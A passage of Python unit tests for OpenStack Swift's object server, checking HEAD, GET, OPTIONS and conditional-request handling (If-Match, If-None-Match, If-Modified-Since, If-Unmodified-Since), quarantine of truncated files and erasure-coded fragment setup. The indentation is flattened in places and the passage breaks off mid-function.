        self.assertEqual(resp.status_int, 404)
        sleep(.00001)
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={
                                'X-Timestamp': timestamp,
                                'Content-Type': 'application/octet-stream',
                                'Content-length': '6'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        sleep(.00001)
        # after DELETE the 404 response carries the tombstone's timestamp
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'DELETE'},
                            headers={'X-Timestamp': timestamp})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 204)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        self.assertEqual(resp.headers['X-Backend-Timestamp'],
                         utils.Timestamp(timestamp).internal)
    def test_HEAD_quarantine_zbyte(self):
        # Test swift.obj.server.ObjectController.HEAD quarantining a
        # zero-byte (metadata-only) data file.
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': timestamp,
                                     'Content-Type': 'application/x-test'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        disk_file = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
                                             policy=POLICIES.legacy)
        disk_file.open()
        file_name = os.path.basename(disk_file._data_file)
        with open(disk_file._data_file) as fp:
            metadata = diskfile.read_metadata(fp)
        # rewrite the data file with its metadata but no body, producing a
        # zero-byte file whose metadata still claims content
        os.unlink(disk_file._data_file)
        with open(disk_file._data_file, 'w') as fp:
            diskfile.write_metadata(fp, metadata)
        file_name = os.path.basename(disk_file._data_file)
        self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
        # HEAD detects the truncated file: 404 to the client ...
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        # ... and the bad file is moved into the quarantine area
        quar_dir = os.path.join(
            self.testdir, 'sda1', 'quarantined', 'objects',
            os.path.basename(os.path.dirname(disk_file._data_file)))
        self.assertEqual(os.listdir(quar_dir)[0], file_name)
def test_OPTIONS(self):
conf = {'devices': self.testdir, 'mount_check': 'false'}
server_handler = object_server.ObjectController(
conf, logger=debug_logger())
req = Request.blank('/sda1/p/a/c/o', {'REQUEST_METHOD': 'OPTIONS'})
req.content_length = 0
resp = server_handler.OPTIONS(req)
self.assertEqual(200, resp.status_int)
for verb in 'OPTIONS GET POST PUT DELETE HEAD REPLICATE \
SSYNC'.split():
self.assertTrue(
verb in resp.headers['Allow'].split(', '))
self.assertEqual(len(resp.headers['Allow'].split(', ')), 8)
self.assertEqual(resp.headers['Server'],
(server_handler.server_type + '/' + swift_version))
def test_GET(self):
# Test swift.obj.server.ObjectController.GET
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertFalse('X-Backend-Timestamp' in resp.headers)
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test',
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.body, 'VERIFY')
self.assertEqual(resp.content_length, 6)
self.assertEqual(resp.content_type, 'application/x-test')
self.assertEqual(resp.headers['content-length'], '6')
self.assertEqual(resp.headers['content-type'], 'application/x-test')
self.assertEqual(
resp.headers['last-modified'],
strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)))))
self.assertEqual(resp.headers['etag'],
'"0b4c12d7e0a73840c1c4f148fda3b037"')
self.assertEqual(resp.headers['x-object-meta-1'], 'One')
self.assertEqual(resp.headers['x-object-meta-two'], 'Two')
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
req.range = 'bytes=1-3'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 206)
self.assertEqual(resp.body, 'ERI')
self.assertEqual(resp.headers['content-length'], '3')
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
req.range = 'bytes=1-'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 206)
self.assertEqual(resp.body, 'ERIFY')
self.assertEqual(resp.headers['content-length'], '5')
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
req.range = 'bytes=-2'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 206)
self.assertEqual(resp.body, 'FY')
self.assertEqual(resp.headers['content-length'], '2')
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.data')
os.unlink(objfile)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
sleep(.00001)
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'Content-Type': 'application:octet-stream',
'Content-Length': '6'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
sleep(.00001)
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertEqual(resp.headers['X-Backend-Timestamp'],
utils.Timestamp(timestamp).internal)
    def test_GET_if_match(self):
        """GET must honour If-Match per RFC 7232 (200 on match, 412 else)."""
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={
                                'X-Timestamp': normalize_timestamp(time()),
                                'Content-Type': 'application/octet-stream',
                                'Content-Length': '4'})
        req.body = 'test'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        etag = resp.etag
        # no If-Match -> plain 200
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.etag, etag)
        # If-Match: * matches any existing object
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Match': '*'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.etag, etag)
        # If-Match: * against a missing object -> 412
        req = Request.blank('/sda1/p/a/c/o2',
                            environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Match': '*'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 412)
        # matching etag -> 200
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Match': '"%s"' % etag})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.etag, etag)
        # non-matching etag -> 412
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
            headers={'If-Match': '"11111111111111111111111111111111"'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 412)
        # list containing the right etag -> 200
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
            headers={
                'If-Match': '"11111111111111111111111111111111", "%s"' % etag})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # list of only wrong etags -> 412
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
            headers={
                'If-Match':
                '"11111111111111111111111111111111", '
                '"22222222222222222222222222222222"'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 412)
    def test_GET_if_match_etag_is_at(self):
        """If-Match evaluated against X-Backend-Etag-Is-At metadata.

        X-Backend-Etag-Is-At names one or more (comma-separated) metadata
        keys whose value should be used instead of the real etag when
        evaluating If-Match; the first name present on the object wins,
        and the real etag is the fallback when none are present.
        """
        headers = {
            'X-Timestamp': utils.Timestamp(time()).internal,
            'Content-Type': 'application/octet-stream',
            'X-Object-Meta-Xtag': 'madeup',
            'X-Object-Sysmeta-Xtag': 'alternate madeup',
        }
        req = Request.blank('/sda1/p/a/c/o', method='PUT',
                            headers=headers)
        req.body = 'test'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        real_etag = resp.etag
        # match x-backend-etag-is-at
        req = Request.blank('/sda1/p/a/c/o', headers={
            'If-Match': 'madeup',
            'X-Backend-Etag-Is-At': 'X-Object-Meta-Xtag'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # match x-backend-etag-is-at, using first in list of alternates
        req = Request.blank('/sda1/p/a/c/o', headers={
            'If-Match': 'madeup',
            'X-Backend-Etag-Is-At':
                'X-Object-Meta-Xtag,X-Object-Sysmeta-Z'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # match x-backend-etag-is-at, using second in list of alternates
        alts = 'X-Object-Sysmeta-Y,X-Object-Meta-Xtag,X-Object-Sysmeta-Z'
        req = Request.blank('/sda1/p/a/c/o', headers={
            'If-Match': 'madeup',
            'X-Backend-Etag-Is-At': alts})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # match x-backend-etag-is-at, choosing first of multiple alternates
        alts = 'X-Object-Sysmeta-Y,X-Object-Meta-Xtag,X-Object-Sysmeta-Xtag'
        req = Request.blank('/sda1/p/a/c/o', headers={
            'If-Match': 'madeup',
            'X-Backend-Etag-Is-At': alts})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # match x-backend-etag-is-at, choosing first of multiple alternates
        # (switches order of second two alternates from previous assertion)
        alts = 'X-Object-Sysmeta-Y,X-Object-Sysmeta-Xtag,X-Object-Meta-Xtag'
        req = Request.blank('/sda1/p/a/c/o', headers={
            'If-Match': 'alternate madeup',
            'X-Backend-Etag-Is-At': alts})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # no match x-backend-etag-is-at
        req = Request.blank('/sda1/p/a/c/o', headers={
            'If-Match': real_etag,
            'X-Backend-Etag-Is-At': 'X-Object-Meta-Xtag'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 412)
        # etag-is-at metadata doesn't exist, default to real etag
        req = Request.blank('/sda1/p/a/c/o', headers={
            'If-Match': real_etag,
            'X-Backend-Etag-Is-At': 'X-Object-Meta-Missing'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # sanity no-match with no etag-is-at
        req = Request.blank('/sda1/p/a/c/o', headers={
            'If-Match': 'madeup'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 412)
        # sanity match with no etag-is-at
        req = Request.blank('/sda1/p/a/c/o', headers={
            'If-Match': real_etag})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # sanity with no if-match
        req = Request.blank('/sda1/p/a/c/o', headers={
            'X-Backend-Etag-Is-At': 'X-Object-Meta-Xtag'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
    def test_HEAD_if_match(self):
        """HEAD must honour If-Match the same way GET does (200/412)."""
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={
                                'X-Timestamp': normalize_timestamp(time()),
                                'Content-Type': 'application/octet-stream',
                                'Content-Length': '4'})
        req.body = 'test'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        etag = resp.etag
        # no If-Match -> plain 200
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.etag, etag)
        # If-Match: * matches any existing object
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'},
                            headers={'If-Match': '*'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.etag, etag)
        # If-Match: * against a missing object -> 412
        req = Request.blank('/sda1/p/a/c/o2',
                            environ={'REQUEST_METHOD': 'HEAD'},
                            headers={'If-Match': '*'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 412)
        # matching etag -> 200
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'},
                            headers={'If-Match': '"%s"' % etag})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.etag, etag)
        # non-matching etag -> 412
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
            headers={'If-Match': '"11111111111111111111111111111111"'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 412)
        # list containing the right etag -> 200
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
            headers={
                'If-Match': '"11111111111111111111111111111111", "%s"' % etag})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # list of only wrong etags -> 412
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
            headers={
                'If-Match':
                '"11111111111111111111111111111111", '
                '"22222222222222222222222222222222"'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 412)
    def test_GET_if_none_match(self):
        """GET must honour If-None-Match (304 on match, 200 otherwise)."""
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={
                                'X-Timestamp': normalize_timestamp(time()),
                                'X-Object-Meta-Soup': 'gazpacho',
                                'Content-Type': 'application/fizzbuzz',
                                'Content-Length': '4'})
        req.body = 'test'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        etag = resp.etag
        # no If-None-Match -> plain 200
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.etag, etag)
        # If-None-Match: * on an existing object -> 304, and the 304 still
        # exposes etag, content-type and user metadata
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-None-Match': '*'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 304)
        self.assertEqual(resp.etag, etag)
        self.assertEqual(resp.headers['Content-Type'], 'application/fizzbuzz')
        self.assertEqual(resp.headers['X-Object-Meta-Soup'], 'gazpacho')
        # If-None-Match: * against a missing object -> 404
        req = Request.blank('/sda1/p/a/c/o2',
                            environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-None-Match': '*'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        # matching etag -> 304
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-None-Match': '"%s"' % etag})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 304)
        self.assertEqual(resp.etag, etag)
        # non-matching etag -> 200
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
            headers={'If-None-Match': '"11111111111111111111111111111111"'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.etag, etag)
        # list containing the matching etag -> 304
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
            headers={'If-None-Match':
                     '"11111111111111111111111111111111", '
                     '"%s"' % etag})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 304)
        self.assertEqual(resp.etag, etag)
    def test_HEAD_if_none_match(self):
        """HEAD must honour If-None-Match the same way GET does (304/200)."""
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'PUT'},
                            headers={
                                'X-Timestamp': normalize_timestamp(time()),
                                'Content-Type': 'application/octet-stream',
                                'Content-Length': '4'})
        req.body = 'test'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        etag = resp.etag
        # no If-None-Match -> plain 200
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.etag, etag)
        # If-None-Match: * on an existing object -> 304
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'},
                            headers={'If-None-Match': '*'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 304)
        self.assertEqual(resp.etag, etag)
        # If-None-Match: * against a missing object -> 404
        req = Request.blank('/sda1/p/a/c/o2',
                            environ={'REQUEST_METHOD': 'HEAD'},
                            headers={'If-None-Match': '*'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        # matching etag -> 304
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'},
                            headers={'If-None-Match': '"%s"' % etag})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 304)
        self.assertEqual(resp.etag, etag)
        # non-matching etag -> 200
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
            headers={'If-None-Match': '"11111111111111111111111111111111"'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.etag, etag)
        # list containing the matching etag -> 304
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'},
            headers={'If-None-Match':
                     '"11111111111111111111111111111111", '
                     '"%s"' % etag})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 304)
        self.assertEqual(resp.etag, etag)
    def test_GET_if_modified_since(self):
        """GET must honour If-Modified-Since against Last-Modified."""
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={
                                'X-Timestamp': timestamp,
                                'Content-Type': 'application/octet-stream',
                                'Content-Length': '4'})
        req.body = 'test'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # date after the PUT -> not modified (304)
        since = strftime('%a, %d %b %Y %H:%M:%S GMT',
                         gmtime(float(timestamp) + 1))
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Modified-Since': since})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 304)
        # date before the PUT -> modified (200)
        since = \
            strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) - 1))
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Modified-Since': since})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        since = \
            strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) + 1))
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Modified-Since': since})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 304)
        # using the server's own Last-Modified value -> 304
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        since = resp.headers['Last-Modified']
        self.assertEqual(since, strftime('%a, %d %b %Y %H:%M:%S GMT',
                                         gmtime(math.ceil(float(timestamp)))))
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Modified-Since': since})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 304)
        # whole-second timestamp: If-Modified-Since equal to it -> 304
        timestamp = normalize_timestamp(int(time()))
        req = Request.blank('/sda1/p/a/c/o2',
                            environ={'REQUEST_METHOD': 'PUT'},
                            headers={
                                'X-Timestamp': timestamp,
                                'Content-Type': 'application/octet-stream',
                                'Content-Length': '4'})
        req.body = 'test'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        since = strftime('%a, %d %b %Y %H:%M:%S GMT',
                         gmtime(float(timestamp)))
        req = Request.blank('/sda1/p/a/c/o2',
                            environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Modified-Since': since})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 304)
def test_HEAD_if_modified_since(self):
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(float(timestamp) + 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
since = \
strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) - 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = \
strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) + 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
since = resp.headers['Last-Modified']
self.assertEqual(since, strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)))))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = self.object_controller.GET(req)
self.assertEqual(resp.status_int, 304)
timestamp = normalize_timestamp(int(time()))
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(float(timestamp)))
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
    def test_GET_if_unmodified_since(self):
        """GET must honour If-Unmodified-Since against Last-Modified."""
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={
                                'X-Timestamp': timestamp,
                                'X-Object-Meta-Burr': 'ito',
                                'Content-Type': 'application/cat-picture',
                                'Content-Length': '4'})
        req.body = 'test'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # date after the PUT -> unmodified (200)
        since = strftime('%a, %d %b %Y %H:%M:%S GMT',
                         gmtime(float(timestamp) + 1))
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Unmodified-Since': since})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # date well before the PUT -> 412, and the 412 still exposes
        # content-type and user metadata
        since = \
            strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) - 9))
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Unmodified-Since': since})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 412)
        self.assertEqual(resp.headers['Content-Type'],
                         'application/cat-picture')
        self.assertEqual(resp.headers['X-Object-Meta-Burr'], 'ito')
        # date well after the PUT -> 200
        since = \
            strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) + 9))
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Unmodified-Since': since})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        # the server's own Last-Modified value -> 200
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        since = resp.headers['Last-Modified']
        self.assertEqual(since, strftime('%a, %d %b %Y %H:%M:%S GMT',
                                         gmtime(math.ceil(float(timestamp)))))
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                            headers={'If-Unmodified-Since': since})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
def test_HEAD_if_unmodified_since(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)) + 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp))))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)) - 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
def assertECBodyEqual(self, resp, expected):
# we pull the policy index from the request environ since it seems to
# be missing from the response headers
policy_index = int(
resp.request.headers['X-Backend-Storage-Policy-Index'])
policy = POLICIES[policy_index]
frags = encode_frag_archive_bodies(policy, expected)
frag_index = int(resp.headers['X-Object-Sysmeta-Ec-Frag-Index'])
self.assertEqual(resp.body, frags[frag_index])
    def _create_ondisk_fragments(self, policy):
        """Create three on-disk files for /a/c/o under ``policy``.

        Returns the tuple (ts_0, ts_1, ts_2) where:
          * ts_0 - a durable PUT of 'OLDER' (EC frag index 0)
          * ts_1 - a POST adding X-Object-Meta-Test
          * ts_2 - a newer PUT of 'NEWER' (EC frag index 2) that is left
            non-durable by stubbing out the diskfile commit step
        """
        # Create some on disk files...
        ts_iter = make_timestamp_iter()
        # PUT at ts_0
        ts_0 = next(ts_iter)
        body = 'OLDER'
        headers = {'X-Timestamp': ts_0.internal,
                   'Content-Length': '5',
                   'Content-Type': 'application/octet-stream',
                   'X-Backend-Storage-Policy-Index': int(policy)}
        if policy.policy_type == EC_POLICY:
            body = encode_frag_archive_bodies(policy, body)[0]
            headers.update({
                'X-Object-Sysmeta-Ec-Frag-Index': '0',
                'Content-Length': len(body),
            })
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'PUT'},
                            headers=headers)
        req.body = body
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # POST at ts_1
        ts_1 = next(ts_iter)
        headers = {'X-Timestamp': ts_1.internal,
                   'X-Backend-Storage-Policy-Index': int(policy)}
        headers['X-Object-Meta-Test'] = 'abc'
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers=headers)
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        # PUT again at ts_2 but without making the data file durable
        ts_2 = next(ts_iter)
        body = 'NEWER'
        headers = {'X-Timestamp': ts_2.internal,
                   'Content-Length': '5',
                   'Content-Type': 'application/octet-stream',
